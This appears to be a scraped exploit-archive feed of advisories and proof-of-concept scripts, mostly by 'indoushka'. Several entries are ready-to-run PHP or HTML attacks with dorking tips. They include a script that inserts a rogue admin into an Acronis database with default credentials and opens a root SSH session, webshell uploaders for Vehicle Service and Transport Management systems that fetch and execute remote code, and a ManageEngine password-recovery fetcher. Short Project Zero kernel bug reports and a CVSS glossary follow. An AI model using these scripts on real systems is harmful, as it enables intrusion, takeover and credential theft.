Acronis Cyber Infrastructure version 5.0.1-61 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.acronis.com/en-eu/products/cyber-infrastructure/                                                                |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] add new admin.[+] Line 83 + 100 +138 + 202 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass AcronisExploit {    private $sshSocket;    private $dbConn;    private $clusterId;        public function __construct() {        // Initialize default values        $this->sshSocket = null;        $this->dbConn = null;        $this->clusterId = null;    }    // Function to add an admin user to PostgreSQL DB    public function addAdminUser($username, $userid, $password) {        echo "Creating admin user $username with userid $userid\n";        // Insert new admin user into the user table        $resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");        if (!$resQuery) return false;        // Insert new admin user into the local_user table        $resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");        if (!$resQuery) return false;                $idLuser = pg_fetch_result($resQuery, 0, 0) + 1;        $resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");        if (!$resQuery) return false;        // Hash the password        $passwordHash = password_hash($password, PASSWORD_BCRYPT);        echo "Setting password $password with hash $passwordHash\n";        $today = date('Y-m-d');        $resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");        if (!$resQuery) return false;        // Assign admin roles        $idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");        $idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");        echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";        $this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");        echo "Successfully created admin user $username with password $password\n";        return true;    }    // Function to run a PostgreSQL query    private function postgresQuery($query) {        $result = pg_query($this->dbConn, $query);        if (!$result) {            echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";            return false;        }        return $result;    }    // Function to login to SSH    public function doSshLogin($ip, $user, $sshKey) {        $connection = ssh2_connect($ip, 22);        if (!$connection) {            echo "SSH connection failed\n";            return false;        }        if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {            $this->sshSocket = $connection;            return true;        } else {            echo "SSH authentication failed\n";            return false;        }    }    // Function to login to Acronis Cyber Infrastructure web portal    public function aciLogin($name, $pwd) {        $postData = json_encode([            'username' => $name,            'password' => $pwd        ]);        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json',            'X-Requested-With: XMLHttpRequest'        ]);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return (strpos($response, '"code":200') !== false);    }    // Function to get the cluster ID    public function getClusterId() {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        $data = json_decode($response, true);        if (isset($data['data'][0]['id'])) {            return $data['data'][0]['id'];        }        return null;    }    // Function to generate SSH keys    private function generateSshKeys() {        $privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');        $publicKey = $privateKey . '.pub';        ssh2_genkeypair($privateKey, $publicKey);        return [            'private' => $privateKey,            'public' => $publicKey        ];    }    // Function to upload SSH public key    public function uploadSshKey($sshKey, $clusterId) {        $postData = json_encode([            'key' => $sshKey,            'event' => [                'name' => 'SshKeys',                'method' => 'post',                'data' => [                    'key' => $sshKey                ]            ]        ]);        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/json',            'X-Requested-With: XMLHttpRequest'        ]);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return (strpos($response, '"task_id"') !== false);    }    // Main exploit function    public function exploit($rhost, $dbPort, $sshPort, $username, $password) {        // Connect to PostgreSQL        $this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");        if (!$this->dbConn) {            echo "Could not connect to PostgreSQL database\n";            return false;        }        // Add a new admin user        $newUsername = substr(md5(rand()), 0, 8);        $newPassword = substr(md5(rand()), 0, 16);        $userId = bin2hex(random_bytes(16));        $this->addAdminUser($newUsername, $userId, $newPassword);        // Login to Acronis        if (!$this->aciLogin($newUsername, $newPassword)) {            echo "Failed to login to Acronis\n";            return false;        }        // Get cluster ID        $this->clusterId = $this->getClusterId();        if (!$this->clusterId) {            echo "Failed to get cluster ID\n";            return false;        }        // Generate SSH keys        $sshKey = $this->generateSshKeys();        // Upload SSH public key        if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {            echo "Failed to upload SSH public key\n";            return false;        }        // SSH Login        if (!$this->doSshLogin($rhost, 'root', $sshKey)) {            echo "SSH login failed\n";            return false;        }        echo "Exploit successful, SSH session established!\n";        return true;    }}// Example usage$exploit = new AcronisExploit();$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery

Vehicle Service Management System version 1.0 suffers from a WYSIWYG code injection vulnerability.

=============================================================================================================================================  
| # Title     : Vehicle Service Management System 1.0 WYSIWYG code injection vulnerability                                                  |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |  
=============================================================================================================================================

poc :

[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php . 

   [+] Line 86 :  Set your Target.

[+] Line 27 :  set your payload.  <textarea name="page[welcome] ===> You can type welcome or about.

[+] save payload as poc.html

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Welcome Page Editor</title>  
    <script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>  
</head>  
<body>  
    <main id="main" class="main">  
        <div class="pagetitle">  
          <h1>Welcome Page</h1>  
          <nav>  
              <ol class="breadcrumb">

                             <li class="breadcrumb-item active">Welcome Page</li>  
              </ol>  
          </nav>  
        </div>

        <div id="msg-container"></div>

                <div class="card rounded-0">  
          <div class="card-body rounded-0 pt-4">  
            <div class="container-fluid">  
              <form id="page-form">  
                <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>  
              </form>  
            </div>  
          </div>  
          <div class="card-footer">  
            <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">  
              <button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>  
            </div>  
          </div>  
        </div>

        <div id="loader" style="display:none;">Loading...</div>  
        <div id="toast"></div>

        <script>  
            // Initialize TinyMCE  
            tinymce.init({  
                selector: 'textarea.tinymce-editor',  
                height: 300,  
                menubar: false,  
                plugins: [  
                  'advlist autolink lists link image charmap print preview anchor',  
                  'searchreplace visualblocks code fullscreen',  
                  'insertdatetime media table paste code help wordcount'  
                ],  
                toolbar: 'undo redo | formatselect | bold italic backcolor | ' +  
                         'alignleft aligncenter alignright alignjustify | ' +  
                         'bullist numlist outdent indent | removeformat | help'  
            });

            // Loader functions  
            function start_loader() {  
                document.getElementById('loader').style.display = 'block';  
            }

            function end_loader() {  
                document.getElementById('loader').style.display = 'none';  
            }

            // Toast function  
            function showMessage(message, type) {  
                const messageDiv = document.getElementById('toast');  
                messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;  
                setTimeout(() =>        {  
                    messageDiv.innerHTML = '';  
                }, 3000);  
            }

            // Form submit event listener  
            document.getElementById('page-form').addEventListener('submit', function(e) {  
                e.preventDefault(); // Prevent page reload

                // Start loader  
                start_loader();

                const formData = new FormData(this); // Get form data  
                const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object

                // Set up request  
                xhr.open('POST', 'http://localhost/vservice/classes/Master.php?f=save_page', true);

                // Handle response  
                xhr.onreadystatechange = function() {  
                    if (xhr.readyState === XMLHttpRequest.DONE) {  
                        end_loader();  
                        if (xhr.status === 200) {  
                            const response = JSON.parse(xhr.responseText);  
                            if (response.status === 'success') {  
                                showMessage('Page updated successfully!', 'success');  
                                location.reload(); // Reload the page if successful  
                            } else if (response.status === 'failed' && response.msg) {  
                                showMessage(response.msg, 'error');  
                            } else {  
                                showMessage('An unknown error occurred.', 'error');  
                            }  
                        } else {  
                            showMessage('Error: ' + xhr.statusText, 'error');  
                        }  
                    }  
                };

                // Send the request  
                xhr.send(formData);  
            });  
        </script>  
    </main>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Vehicle Service Management System 1.0 WYSIWYG Code Injection

In OpenStack Ironic before 21.4.4, 22.x and 23.x before 23.0.3, 23.x and 24.x before 24.1.3, and 25.x and 26.x before 26.1.0, there is a lack of checksum validation of supplied image_source URLs when configured to convert images to a raw format for streaming.

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-8h22-6qwx-q4w9: OpenStack Ironic fails to verify checksums of supplied image_source URLs

Vehicle Service Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Vehicle Service Management System 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This code injects the malicious file in path : http://$target_ip/uploads/[+] save payload as poc.php[+] usage : C:\www\test>php poc.php localhost/vservice[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'save' => '',        'username' => 'az',        'password' => 'az@gt.gt',      'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),                  'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/classes/Users.php?f=save");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Vehicle Service Management System 1.0 Code Injection

Transport Management System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Transport Management System 1.0 Remote File Upload Vulnerability                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 6.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head profile="http://www.w3.org/2005/10/profile">  
<script data-ad-client="ca-pub-2400875940842439" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>  
<br>  
            <form class="form-horizontal" action="http://127.0.0.1/Transport-Management/newvehicle.php" method="post" enctype="multipart/form-data">

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Registration Number</b></span>  
                  <input id="vehreg" type="text" class="form-control" name="vehregno" placeholder="Reg No">  
                </div>  
                <br> 

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Chesis No</b></span>  
                  <input id="vehchesis" type="text" class="form-control" name="vehchesis" placeholder="Chesis No">  
                </div>  
                <br> 

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Brand</b></span>  
                  <input id="vehbrand" type="text" class="form-control" name="vehbrand" placeholder="Brand">  
                </div>  
                <br>

                                <div class="input-group">  
                  <span class="input-group-addon"><b>Color</b></span>  
                  <input id="vehcolor" type="text" class="form-control" name="vehcolor" placeholder="Color">  
                </div>  
                <br>

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Registration Date</b></span>  
                  <input id="vehregdate" type="text" class="form-control" name="vehregdate" placeholder="Registration date">  
                </div>  
                <br>

                                                               <script>  
                      $( function() {  
                        $( "#vehregdate" ).datepicker();  
                      } );  
                </script> 

                                                <br>

                                 <div class="input-group">  
                  <span class="input-group-addon"><b>Description</b></span>  
                     <textarea rows="5" id="draddress" type="text" class="form-control" name="vehdescription" placeholder="Address"> </textarea>

                                  </div>  
                <br>

                                  
                <div class="input-group">  
                  <span class="input-group-addon"><b>Photo</b></span>  
                  <input  type="file" class="form-control" name="file"> 

              </div>

                                                 <br>

                                <div class="input-group">  
                  <input type="submit" name="submit" class="btn btn-success">

                                  </div>

              </form>     
        </div>    
        <div class="col-md-3"></div>

[+] http://127.0.0.1/Transport-Management/vehicle%20picture/hacked.txt

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

Transport Management System 1.0 Arbitrary File Upload

Transport Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Transport Management System 1.0 php code injection Vulnerability                                                            || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.xyz/download/project/user/2022/202203/kashipara.com_transport-management-syste.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a shell.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 2.php 127.0.0.1/Transport-Management/[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'submit' => '',        'vehregno' => '3',    'vehchesis' => '00213771818860',    'vehdescription' => 'hacked by indoushka',    'file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),            'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/newvehicle.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/vehicle picture/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Transport Management System 1.0 Code Injection

ManageEngine ADManager version 7183 suffers from a password hash disclosure vulnerability.

    =============================================================================================================================================| # Title     : ManageEngine ADManager 7183 Password Hash Disclosure Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.manageengine.com/products/ad-manager/                                                                           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] ManageEngine ADManager Plus versions prior to build 7183 suffers from a  Password Hash disclosure vulnerability..[+] save code as poc.php .[+] USage : php poc.php -t <target_url> -a <auth> -u <username> -p <password>[+] PayLoad :<?php// تعطيل تحذيرات HTTPSerror_reporting(0);function getPass($target, $auth, $user, $password) {    // تهيئة Session    $ch = curl_init();        // تحويل نوع المصادقة إذا كان ADManager    if (strtolower($auth) == 'admanager') {        $auth = 'ADManager Plus Authentication';    }        // بيانات تسجيل الدخول    $data = http_build_query([        "is_admp_pass_encrypted" => "false",        "j_username" => $user,        "j_password" => $password,        "domainName" => $auth,        "AUTHRULE_NAME" => "ADAuthenticator"    ]);        // إعدادات الطلب    $url = $target . 'j_security_check?LogoutFromSSO=true';    curl_setopt($ch, CURLOPT_URL, $url);    curl_setopt($ch, CURLOPT_POST, true);    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_HTTPHEADER, [        "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",        "Content-Type: application/x-www-form-urlencoded"    ]);    // إرسال الطلب    $response = curl_exec($ch);        // التحقق من المصادقة    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);    if (strpos($response, 'Cookie') !== false) {        echo "[+] Authentication successful!\n";    } elseif ($http_code == 200) {        echo "[-] Invalid login name/password!\n";        exit(0);    } else {        echo "[-] Something went wrong!\n";        exit(1);    }    // استرجاع كلمة المرور    for ($i = 1; $i <= 5; $i++) {        echo "[*] Trying to fetch recovery password for domainId: $i!\n";        $passUrl = $target . 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' . $i . '%22%7D';        curl_setopt($ch, CURLOPT_URL, $passUrl);        curl_setopt($ch, CURLOPT_POST, false);        $passResponse = curl_exec($ch);                if ($passResponse) {            echo $passResponse . "\n";        }    }    curl_close($ch);}function get_args() {    global $argv;    $args = [        'target' => '',        'auth' => '',        'user' => '',        'password' => ''    ];    for ($i = 1; $i < count($argv); $i++) {        switch ($argv[$i]) {            case '-t':            case '--target':                $args['target'] = $argv[++$i];                break;            case '-a':            case '--auth':                $args['auth'] = $argv[++$i];                break;            case '-u':            case '--user':                $args['user'] = $argv[++$i];                break;            case '-p':            case '--password':                $args['password'] = $argv[++$i];                break;        }    }    return $args;}function main() {    $args = get_args();    if (!$args['target'] || !$args['auth'] || !$args['user'] || !$args['password']) {        echo "Usage: php exploit.php -t <target_url> -a <auth> -u <username> -p <password>\n";        exit(1);    }    getPass($args['target'], $args['auth'], $args['user'], $args['password']);}main();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ManageEngine ADManager 7183 Password Hash Disclosure

A condition exists when fastrpc_mmap_create creates a new globally visible mapping that can lead to a use-after-free.

fastrpc_mmap_create Use-After-Free

An incorrect searching algorithm in fastrpc_mmap_find can lead to kernel address space information leaks.

    Inside of fastrpc_mmap_find, there exists the following code to search for ADSP_MMAP_HEAP_ADDR or ADSP_MMAP_REMOTE_HEAP_ADDR allocations:hlist_for_each_entry_safe(map, n, &me->maps, hn) {      if (va >= map->va &&      va + len <= map->va + map->len &&      map->fd == fd) {          if (refs) {              if (map->refs + 1 == INT_MAX) {                   spin_unlock_irqrestore(&me->hlock, irq_flags);                   return -ETOOMANYREFS;              }             map->refs++;          }          match = map;          break;      }                  }   This code is wrong at a couple different levels, particularly in the case of a fastrpc_mmap_create-->fastrpc_mmap_find call coming from userland such as in the FASTRPC_IOCTL_MEM_MAP ioctl. I think this code path may not be intended to be reachable from userland at all - although even for requests issued from kernel-land, the contract for this code appears to have some correctness issues. This code uses map->va for finding an associated mapping which for these heap addresses comes from a call to dma_alloc_attrs inside of fastrpc_alloc_cma_memory.  dma_alloc_attrs has two different modes of operation - one returns a kernel virtual address to the allocated memory, and the other returns a struct page pointer that serves as an opaque cookie for the allocated memory. We have the latter case for this invocation of dma_alloc_attrs because of the DMA_ATTR_NO_KERNEL_MAPPING flag applied in fastrpc_mmap_create_remote_heap. We can see this looking at the debugfs-visible global file in the adsprpc directory:===================================  GMAPS  ====================================  fd                  |phys                |size                |va                    --------------------------------------------------------------------------------  -1                  |0xE883A000          |0x1000              |0xFFFFFFFE01A20E80       -1                  |0xE8839000          |0x1000              |0xFFFFFFFE01A20E40       -1                  |0xE8838000          |0x1000              |0xFFFFFFFE01A20E00       -1                  |0xE8837000          |0x1000              |0xFFFFFFFE01A20DC0       -1                  |0xE8836000          |0x1000              |0xFFFFFFFE01A20D80       -1                  |0xE8835000          |0x1000              |0xFFFFFFFE01A20D40       0                   |0xE8834000          |0x1000              |0xFFFFFFFE01A20D00       0                   |0xE8833000          |0x1000              |0xFFFFFFFE01A20CC0       0                   |0xE8832000          |0x1000              |0xFFFFFFFE01A20C80       -1                  |0xE8900000          |0x200000            |0xFFFFFFFE01A24000      This means we end up comparing a userland supplied value against a kernel page pointer - behavior of the kernel ioctl FASTRPC_IOCTL_MEM_MAP differs in userland visible ways based on the outcome of the comparison, meaning that userland can leak kernel page pointer addresses by "guessing" a possible address and observing the resulting error code. Here is the output from the attached PoC on a Samsung S23:  dm1q:/data/local/tmp $ ./poc  Detected address 0xfffffffe01c00000  Final address: 0xfffffffe01a24000   Additionally, because map->va is a struct page pointer as opposed to a genuine address to the underlying buffer, the usage of map->va + map->len is incorrect, and can lead to there being multiple map matches for the same calling parameters.  **This bug is subject to a 90-day disclosure deadline. If a fix for this**  **issue is made available to users before the end of the 90-day deadline,**  **this bug report will become public 30 days after the fix was made**  **available. Otherwise, this bug report will become public at the deadline.**  The scheduled deadline is 2024-09-22.   **For more details, see the Project Zero vulnerability disclosure policy:**  **https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-**   **policy.html** Related CVE Number: CVE-2024-33060.

fastrpc_mmap_find Information Leak

There appears to be some (possibly deprecated) code associated with AF_QIPCRTR sockets in bpf_service.c. Within this file are some ioctl handlers - e.g. qrtr_bpf_filter_attach and qrtr_bpf_filter_detach. In the case of qrtr_bpf_filter_detach, the global pointer bpf_filter is fetched and freed while only holding a socket lock (and an irrelevant rcu_read_lock) - this may lead directly to double frees or use-after-free (kernel memory corruption) if a malicious user is able to call the QRTR_DETTACH_BPF ioctl on multiple AF_QIPCRTR sockets at once. Based on Android SELinux files, it appears this may be possible from some lower-privileged vendor and HAL services.

    There appears to be some (possibly deprecated) code associated with AF_QIPCRTR sockets in bpf_service.c. Within this file are some ioctl handlers - e.g. qrtr_bpf_filter_attach and qrtr_bpf_filter_detach.In the case of qrtr_bpf_filter_detach, the global pointer bpf_filter is fetched and freed while only holding a socket lock (and an irrelevant rcu_read_lock) - this may lead directly to double frees or UAF (kernel memory corruption) if a malicious user is able to call the QRTR_DETTACH_BPF ioctl on multiple AF_QIPCRTR sockets at once. Based on Android SELinux files, it appears this may be possible from some lower-privileged vendor and HAL services.As we don't have a device (nor see any examples of existing Android devices) containing the necessary kernel configuration (CONFIG_QRTR_BPF_FILTER), we are presently unable to reproduce a crash for this bug. If you're aware of this option being enabled on any production kernels, I would be interested to know!This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-09-22.For more details, see the Project Zero vulnerability disclosure policy:https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlNOTE:This was originally reported as a non-security issue on June 17th, however Qualcomm has confirmed that there are affected devices and that they consider this a security issue, so adding this to the tracker.Related CVE Number: CVE-2024-38401.

Latest News